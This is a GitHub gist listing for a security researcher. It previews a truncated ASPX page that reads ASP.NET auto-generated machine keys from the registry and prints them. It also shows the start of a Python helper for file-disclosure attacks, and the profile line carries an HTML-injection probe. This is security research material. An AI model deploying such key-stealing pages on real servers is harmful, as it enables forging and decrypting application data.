Soroush Dalili irsdl
- @irsdl The Contrived World of InfoSec "'><b>abcd
- http://www.secproject.com/
irsdl
/ machineKeyFinder.aspx
Last active Jun 27, 2019
To find validation and decryption keys when AutoGenerate has been used in Machine Key settings
View machineKeyFinder.aspx
| <%@ Page Language="C#" %> | |
| <% | |
| // Read https://soroush.secproject.com/blog/2019/05/danger-of-stealing-auto-generated-net-machine-keys/ | |
| Response.Write("<br/><hr/>"); | |
| byte[] autoGenKeyV4 = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\", "AutoGenKeyV4", new byte[]{}); | |
| if(autoGenKeyV4!=null) | |
| Response.Write("HKCU\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\AutoGenKeyV4: "+BitConverter.ToString(autoGenKeyV4).Replace("-", string.Empty)); | |
| Response.Write("<br/>"); | |
| byte[] autoGenKey = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\2.0.50727.0\\", "AutoGenKey", new byte[]{}); | |
| if(autoGenKey!=null) |
View iso-8859-1_to_binary.py
| # Convert from iso-8859-1, utf-8ed to binary! | |
| # Useful for file disclosure when encoding can be controlled | |
| # The following C# code shows an example (result is iso-8859-1, utf-8ed!): | |
| ###string encoding = "iso-8859-1"; | |
| ######string sourceFile = @"Newtonsoft.Json.dll"; | |
| ###### | |
| ######public void test() | |
| ######{ | |
| #########System.Text.Encoding myEncoding = Encoding.GetEncoding(encoding); | |
| #########String sourceFilePath = Directory.GetCurrentDirectory() + @"\" + sourceFile; |